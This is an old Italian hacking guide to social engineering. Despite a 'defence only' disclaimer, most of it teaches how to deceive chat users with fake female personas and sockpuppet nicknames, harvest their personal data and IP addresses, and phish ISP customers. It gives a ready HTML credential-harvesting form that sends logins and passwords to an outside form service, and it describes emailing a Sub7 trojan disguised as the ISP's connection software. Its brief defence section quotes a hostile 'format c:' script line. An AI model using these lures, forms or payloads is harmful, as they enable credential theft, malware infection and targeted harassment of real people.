(Social engenering)
Questa guida, , è stata scritta per insegnare gli utenti inesperti a difendersi dagli attacchi lamer.
Tutti gli attacchi descritti sono stati spiegati solo per poterli facilmente individuare.
Social Engineering può essere tradotto con ingegneria sociale, ovvero la scienza che si occupa dei rapporti con gli altri…
Il social engineering, infatti è “l’arte” che permette di ottenere informazioni e/o compiere azioni che normalmente sono riservate a pochi.
Come si realizza questo? Semplice, spacciandosi per uno di quei pochi!
In pratica il social engineering si basa sulla menzogna, si contatta una vittima, ci si finge qualcun altro che in qualche modo potrebbe essere, od è, legato alla vittima e si prova ad ottenere informazioni e/o a compiere azioni sotto la falsa identità.
Ecco un esempio:
Se telefono a un tizio e gli chiedo di darmi il numero della sua carta di credito, lui come minimo mi ride in faccia e mi riempie di insulti… ma se invece chiamo il tizio e mi spaccio per un impiegato della sua banca (meglio ancora se realmente esistente), dicendo che dobbiamo effettuare un operazione temporanea di transito del suo capitale a causa di problemi interni e che abbiamo bisogno del suo numero per risolverli… bhè, al 90% otterremo quello che vogliamo (dipende sempre dall’altra persona, e da quanto riusciamo ad essere convincenti).
Logicamente il social engineering non è una scienza esatta, se pretendete di mandare una fake email alla casa bianca dicendo di essere il presidente e di voler sapere i codici per attivare una guerra nucleare perchè ve li siete scordati, non credo che verrete tanto creduti…
Ricordate sempre la buona riuscita dell’operazione di social engineering si basa sempre su due fattori:
1- La nostra abilità e furbizia.
2- La demenza della vittima =)
Spero che sia chiaro che l’esempio di prima era solo un esempio, qui non imparerete a fottere i numeri di carta di credito (anche perchè è inllegale e contro i miei principi ,quello che è lo scopo,il sapere)!
Bene, finita la teoria iniziale, passiamo a qualcosa di più pratico.
Allora, per poter comprendere appieno questa guida è necessario avere conoscenze basi di HMTL & JAVASCRIPT, alcuni esempi che farò saranno interamente basati su questi due linguaggi, benchè cercherò di spiegarli in modo da farli capire anche a un neofita la conoscenza di essi è indispensabile per chi vuole operare da se e non limitarsi a eseguire un copia e incolla dei miei listati.
Per quanto riguarda i programmi, c’è bisogno di un buon trojan e di un buon fake mailer/bomber
Inoltre è necessario un requisito personale, che purtroppo nessuno vi può dare, la rapidità di pensiero e di organizzazione. La prima è necessaria per sapersela cavare in ogni situazione imprevista, la seconda per saper pianificare al meglio le nostre azioni.
Il social engineering nelle chat può essere effettuato per diverse ragioni:
– Venire a conoscenza di quante più informazioni sulla vittima per poter essere in grado di compilare una word list con delle password che lui potrebbe usare (per utilizzarla da qualche parte).
– Sapere l’indirizzo email della vittima.
– Ottenere l’IP della vittima.
– Infettare la vittima con un trojan.
Ma vediamo le cose con calma.
Per ottenere quante più informazioni possibili su di una vittima ci sono diversi modi.
Il più semplice, dal punto di vista della realizzazione, è quello di chattare con la vittima, mantenendo il dialogo sempre su di un tono molto tranquillo…
Mi spiego meglio: se contattiamo un tizo in chat e senza dargli il tempo di parlare gli chiediamo, nome, cognome, città, hobby, ecc… difficilmente otterremo una risposta.
Ma se con lui instauriamo un rapporto di amicizia reciproca e magari salviamo ogni volta la conversazione che abbiamo avuto, alla fine saremo in grado di stilare una word list.
Questa operazione può richiedere da alcuni giorni ad alcune settimane, e non sempre porta a buoni risultati, ma in genere è la più sicura, in quanto la vittima, se siete abili, non potrà mai sospettare nulla di voi, per qualsiasi cosa gli accada… =)
Questa tecnica ha un problema di fondo, si basa sul dialogo, e considerando che in genere si cerca di fare del male a persone con cui non si hanno buoni rapporti… è un pò difficile pretendere di minacciare uno di morte e il giorno dopo, come per magia, pretendere che chatti con voi d’amore e d’accordo…
In questo ci può aiutare il social engineering.
Ci sono diverse tecniche per riuscire a chattare con la vittima:
1- Il modo più semplice per chattare con un uomo qual’è? Semplice… fingere di essere una donna!
Questa tecnica permette nel 99% dei casi la buona riuscita dell’obbiettivo preposto.
Per farlo è necessario crearsi nella chat un nick di donna (se si usano chat basate su programmi tipo C6. altrimenti è sufficiente collegarsi con un nick di donna nelle chat basate sul web/java), e contattare la vittima.
Il primo grande problema che si incontra utilizzando questa tecnica, è quello che non appena si accede in chat con un nick di donna si viene bombardati da richieste di altri uomini (richieste di sesso x di più!). Per questo è indispensabile rendersi indisponibili a chattare con gli altri (sempre se si usa un programma di chat tipo C6, in cui cioè, è possibile selezionare una opzione simile) per potersi concentrare sul proprio obbiettivo.
Se invece la vittima è disposta almeno nelle prime volte al dialogo, bhè, dateci dentro e cercate di ottenre quante più informazioni potete, magari la prima volta fate una specie di botta-risposta per conoscerlo, in pratica proponete che ognuno parli di se. Abbiate cura al termine della conversazione di salvarla per poterla osservare con cura in seguito. Inoltre prima di un’azione del genere preparate una scheda su di voi, in modo da non creare sospetti nel caso non vi venisse al momento cosa inventare su una determinata domanda fatta dalla vittima, per essere ancora più convincenti mandategli anche una vostra foto… logicamente non vostra =) ma di una ragazza con cui avete chattato, in quanto deve essere credibile (se mandate una foto presa dal sito di pamela andersson non penso vi crederà… =).
2- Un altro metodo è quello di diventare “colleghi” della vittima.
Ovvero prendiamo il caso che il bastardo sia uno che va nelle chat a dire cose tipo “meridionali di merda, terroni, ecc..”, bhè… persone così non sono altro che ignoranti e stupide, quindi degli ottimi bersagli per il social engineering =)
Come ci dobbiamo comportare noi? Semplice, assecondiamolo, comportiamoci come lui, diamo forza alle sue menate.
Poi contattiamolo in privato e iniziamo a chattarci.
Questa è una tecnica che può ferire un pò nell’orgoglio, in quanto io, da napoletano, non direi nemmeno se costretto con una pistola alla tempia “terroni di merda”, ma basta pensare che questo piccolo sacrificio con buona probabilità ci permetterà di fare davvero del male al coglione, che tutto risulta più facile…
Questa tecnica è un pò rischiosa, in quanto alle volte ci si fa scoprire dalla vittima in quanto si usa un espressione o si dice qualcosa che uno come lui non direbbe mai (se ad esempio vi scappa un’espressione napoletana tipo “azz'” mentre chattate con quello che attacca i terroni, vi fate scoprire).
3- Una evoluzione della tecnica precedente è quella di utilizzare due nick contemporaneamente nella stessa chat dove è presente la vittima.
Tale tecnica può essere realizzata facilmente in chat basate sul web (tipo quella di yahoo, ecc..) aprendo due volte contemporaneamente la stessa pagina (quindi eseguendo due volte il browser) e entrando con due nick diversi.
Nelle chat basate su programmi c’è bisogno di un piccolo accorgimento.
Ora che abbiamo due nick possiamo guadagnare molto più facilmente la fiducia della vittima.
Ad esempio con un nick lo attacchiamo, riempiendolo di parole, sfottendolo, offendendolo, e con l’altro lo difendiamo, per poi andarlo a contattare in privato, magari per commentare la demenza della persona che lo attaccava (sempre voi).
Logicamente queste 3 tecniche servono solo per farvi conoscere la persona, il dialogo poi lo dovete impostare voi a seconda dei casi, non esiste una regola generale su come comportarsi.
L’importante è sempre di immergersi nel personaggio che si sta fingendo di essere, in modo da non tradirsi mai.
Una volta che siete riusciti a chattare con la vittima non dovrebbe risultare difficile ottenere la sua email, soprattutto se si utilizza un nick di ragazza e si esegue la parte seguente:
ci si collega, si contatta la vittima, ci si parla un poco, e dopo un paio di minuti all’improvviso si dice che per un motivo qualsiasi dovete andare subito, ma… ma, ditegli anche che volete restare in contatto con lui, e che volete la sua email, se lui è diffidente dategli una vostra creata appositamente per le operazioni di social engineering e ditegli di contattarvi lì (abbiate cura nella scelta dell’email, se il vostro nick è ad es.: beba24, l’email non potrà essere giovanni_rossi@tin.it).
Ottenere l’IP della vittima è un operazione semplicissima, basta collegarsi con un nick di ragazza, chattare un pò e poi mandargli la vostra foto (quella falsa, di cui ho parlato prima), che lui sicuramente vorrà.
Logicamente per fare ciò c’è bisogno di una chat che permette lo scambio di files, altrimenti niente!
Non appena la foto comincerà ad essere inviata, aprite una finestra MS-Dos (Avvio–>Esegui–>command oppure doppio clik sull’icona di ms-dos presente in avvio) e digitate il seguente comando:
c:\>netstat -an
Tale comando visualizzerà tutte le connessioni attive al momento, e quindi anche l’IP della vittima.
Tutte le tecniche illustrate sopra sono rivolte contro vittime maschi, ma se vogliamo attaccare una ragazza?
Bhè… il discorso diventa molto più complicato,
Comunque provate sempre, la speranza è l’ultima a morire.
Il modo per riuscire a colpire col maggior danno possibile un utente di internet qual’è?
Semplice, infettarlo con un trojan!
Tutti gli attacchi di questo modo su IP al massimo gli fanno crashare il pc, un trojan è (quasi) per sempre e dà poteri pressapoco illimitati sul pc vittima!
Non vi spiegherò come usare un trojan, ne come infettare una vittima via chat.
La prima regola del social engineering è quella di fingere, camuffare e mentire sempre.
Ci sono due casi principali, quando si vuole carpire dati a qualcuno:
1) La persona che si vuole fregare è un perfetto sconosciuto.
2) La persona designata ci da la sua fiducia (poichè siamo riusciti a guadagnarla grazie alle tecniche spiegate nella sezione (3).
I
Invece per cosa fare con l’email della vittima?
[5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL]
Il social engineering applicato alle email è sicuramente più difficile nella realizzazione di quello applicato alle chat, ma se svolto con cura permette di ottenere migliori risultati (in genere…).
Lo scopo principale del social engineering applicato alle email è quello di ottenere una password dell’account dell’utente, del suo sito personale, ecc..
Per fare ciò ci sono diverse tecniche:
1- Ci si crea un indirizzo email dello stesso dominio della vittima, con nick tipo serv_assist, assistenza, marketing, sevizio.assistenza ecc…
In pratica se la vittima ha un indirizzo ciccio@isp.it noi dobbiamo andare a crearci un indirizzo tipo serv_assist@isp.it . Fatto ciò scriviamo una bella email alla vittima in cui diciamo più o meno così:
>Gentile Utente,
> A causa di problemi tecnici alcune informazioni sui nostri utenti sono state smarrite.
> Per poterle ripristinare abbiamo bisogno del suo login e della sua password, pertanto la preghiamo di
> inviarceli a questo indirizzo: serv_assist@isp.it
> Certi della sua collaborazione la ringraziamo.
>
> Il Responsabile Tecnico isp.it
> Ing. Mario Monti
Logicamente potete inventare scuse meglio articolate per rendere il tutto più credibile.
Però… questa tecnica, ha possibilità di riuscita tendente a 0… Bisogna solo essere così fortunati da trovare un utente che ha acquistato il suo primo pc un giorno prima (che tralatro deve essere pure un pò idiota…).
Io qui l’ho citata per non tralasciare niente, ma vi sconsiglio vivamente di usarla, anche perchè così rischiate solo di mettere in allerta la vittima, che riconsocerà molto più facilmente eventuali tentativi di social engineering.
2- Questa tecnica richiede una maggiore preparazione, ma garantisce probabilità di riuscita nettamente superiori alla prima.
La prima cosa che dobbiamo fare è studiare il provider che fornisce l’email alla vittima.
Facciamo sempre l’esempio che la vittima abbia come indirizzo cicco@isp.it .
Noi ci colleghiamo al sito di isp.it e preleviamo i loghi in esso presenti, se magari ci creiamo un account su di esso e aspettiamo che ci venga inviata un email da loro (in genere ogni ISP ha un servizio di newsletter abbinato alla casella email). Terminata questa fase di studio prepariamo un email che sia quanto più familiare al sito, e alle email inviate.
Ad esempio, se l’isp invia email mettendo in alto una fascia verde con all’interno il suo logo, noi ripeteremo esattamente il procedimento visto nel punto 1 ma aggiungendo i particolari grafici appropiati.
Per fare ciò è necessario conoscere l’HTML in quanto bisognerà creare una pagina HTML per poi passare tutto il codice in un email.
3- La terza tecnica è una seccessiva evoluzione della seconda.
In pratica è richiesta la stessa preparazione con una piccola aggiunta alla fine…
La piccola aggiunta consiste nell’inserimento di un form, ovvero di due campi in cui la vittima deve inserire il proprio login e password e cliccare poi sul pulsante invia.
L’email si presenterà esattamente come quella spiegata nel punto 2 soltanto che l’aggiunta del form la farà sembrare ancora più autentica.
Però sorge un problema… per utilizzare un form è necessario poter disporre di un server che gestisca script cgi, il che è praticamente impossibile nei servizi gratuiti, quindi o sborsate per un server, o… vi affidate a qualche servizio di gestione form gratuito tipo Bravenet (www.bravenet.com).
Una volta registrati al servizio vi verrà fornito il codice HTML che dovrete inserire nel vostro sito.
Però il codice che vi verrà fornito visualizzerà la loro grafica e i loro pulsanti, e questo a noi certo non va bene… per questo bisogna modificarlo e renderlo simile a quello sottostante.
<form action=”http://pub14.bravenet.com/emailfwd/senddata.asp” method=”post”>
<input type=”hidden” name=”usernum” value=”xxxxxxxx”>
<input type=”hidden” name=”cpv” value=”1″>
Login: <input type=”text” name=”login” size=”20″>
Password: <input type=”text” name=”password” size=”20″>
<input type=”submit” name=”submit” value=” Invia “>
</form>
(le xxxxxxxx sono il vostro numero identificativo di bravenet)
I primi due campi input non devono essere modificati, in quanto sono quelli che bravenet usa per riconoscervi, i secondi due sono quelli che definiscono i campi che la vittima deve compilare, l’ultimo è quello che definisce il pulsante invia.
Il codice HTML soprastante può essere inserito in tabelle e contornato da elementi grafici (ad esempio si può usare come pulsante invia l’immagine utilizzate da isp.it per i suoi pulsanti).
Se magari nel sito di isp.it è presente una mascherina per accedere alla posta via web, possiamo copiare il codice che ci interessa dalla loro pagina e modificare solo i campi del form inerenti all’invio dei dati (che non dovranno più essere usati per accedere all’area utente, ma che ci dovranno essere inviati).
Il tutto sta nella vostra capacità realizzativa.
Tale tecnica è senza dubbio la migliore e la più efficace in quanto non richiede di possedere un indirizzo email appropriato, poichè la vittima ci invierà i dati tramite il form presente nell’email.
Quindi in questo caso dovremmo utilizzare un programma tipo Xmass2000 con cui inviare la nostra fake email basata sull’HTML preparato.
Sia la tecnica 2 che la 3 necessitano di immagini, tali immagini possono essere prelevate dal sito proprietario dell’email della vittima (negli esempi fatti isp.it) e caricate su un qualsiasi server gratuito (ormai ogni ISP offre uno spaio web gratuito) per poterle poi utlizzare quando si vuole ed evitare che eventuali aggiornamenti del sito da cui sono state prelevate compromettano il nostro operato.
Se infatti ad esempio il logo di isp.it ha indirizzo http://isp.it/img/loghi/logo_main.gif e noi utilizziamo questo indirizzo nel nostro codice HTML e libero lo cambia per qualsiasi motivo, bhè… il nostro piano fallisce ancora prima di cominciare!
[6) FARE MALE QUALCUNO VIA EMAIL]
Ci sono diversi modi di fare male qualcuno via email, ma anche qui il modo che comporta maggior danno è quello di riuscire a infettarlo con un trojan.
Molti lamer inviano fakemail a indirizzi vari con un file .exe allegato, magari lasciando anche il testo vuoto, sperando nella curiosità/stupidità di chi riceve l’email.
Ma questo è un sistema che ormai non funziona nemmemo per sbaglio…
Quindi per poter sperare che la vittima esegua il nostro bel server dobbiamo affidarci ancora una volta al social engineering.
A mio parere la tecnica più affidabile è la seguente:
Inviamo una fake email come spiegato nella seconda tecnica nella sezione (5) alla vittima spacciandoci per l’ISP che gestisce il suo indirizzo con il seguente testo:
>Gentile Utente,
> Siamo lieti di informala che da oggi è possibile utilizzare il nuovo programma di connessione di
> inn.it.
> Il nuovo programma vi permetterà di ottenere connessioni più sicure e più stabili.
> Tale programma le è stato allegato a questa email, per poterlo utilizzare è necessario eseguire
> il file allegato e seguire i semplici passi dell’installazione.
> Per eventuali dubbi o domande inviate un email a assist_tecn@innp.it
>
>
> Il Responsabile Tecnico isp.it
> Ing. Lino Bolli
(l’indirizzo assist_tecn@isp.it deve essere inventato, di certo non vi interessa conoscere le lamentele delle vittime =)
Come allegato dell’email inseriremo il server del nostro sub7 avendo cura di modificare l’icona con quella del vero programma di connessione dell’ISP.
Magari per rendere la cosa quanto meno sospetta possiamo far generare un messaggio di errore al server di sub7 in modo che l’utente creda che ci sia stato qualche problema.
Per ottenere le icone dei vari ISP è sufficente trovare un cd di connessione a internet che viene distribuito nei negozi, per strada, nei giornali.
Tutti gli ISP distribuisco il proprio CD gratuitamente da qualche parte.
Se proprio non riuscite a trovarlo, provate a chiedere a qualche vostro amico se utilizza quel determinato ISP.
Se anche questa ricerca risulta infruttuosa, provate a vedere sul sito dell’ISP se è possibile scaricare il loro programma di connessione, in genere dopo che ci si è registrati si ha tale possibilità.
COME DIFENDERSI]
Questa guida, come detto nel primo disclaimer, è stata scritta per insegnare gli utenti inesperti a difendersi dagli attacchi lamer.
Tutti gli attacchi descritti sono stati spiegati per poterli facilmente individuare.
In questa sezione però vi darò altri consigli per poterli prevenire e/o annullare.
Per quanto riguarda le chat, c’è poco da dire, la diffidenza è l’unica arma, che però se accompagnata da un buon firewall e da un buon antivirus assicura una discreta sicurezza.
Logicamente il mio consiglio è quello di non eseguire mai file che ci vengono date da persone in chat, a meno che non siano nostri amici (reali) di lunga data.
Per quanto riguarda le email il discorso cambia.
Infatti oltre al solito suggerimento di cestinare all’istante le email di provenienza sconosciuta contenenti allegati .exe e di utilizzare un antivirus ci sono altri accorgimenti per prevenire attacchi basati su script allegati alle mail.
Se infatti si subisce un attacco basato su un javascript basta riavviare il pc, eseguire Internet Explorer e andare in OPZIONI–>PROTEZIONE–>PERSONALIZZA LIVELLO e disattivando controlli e plug-in Active-X e esecuzione script.
Poi riavviare Outlook e selezionare il messaggio “infetto”, questa volta però non accadrà niente e potremo cancellarlo liberamente.
Un consiglio generale è anche quello di rinominare i files comando più pericolosi come i seguenti:
format.com –> form.com
deltree.exe –> dt.exe
tali files sono contenuti nella cartella windows\command\ e possono essere rinominati col seguente comando:
c:\>rename comando.xxx nuovo_nome.xxx
dove xxx è l’estensione del file.
In tal modo eventuali tentativi di formattarci il disco rigido non avranno successo in quanto nello script ci sarà una riga di questo genere:
comando_js(“format c: /q /autotest >> NULL”)
che otterrà come risultato solo un misero “comando o nome di file non valido” =)
LA GUIDA E UN PO VECCHIA MA I CONCETTI SONO SEMPRE GLI STESSI
FONTI WEB,TASTIERA MAUSE
MI RACOMANDO solo per difendevi, altrimenti prima o poi vi prendono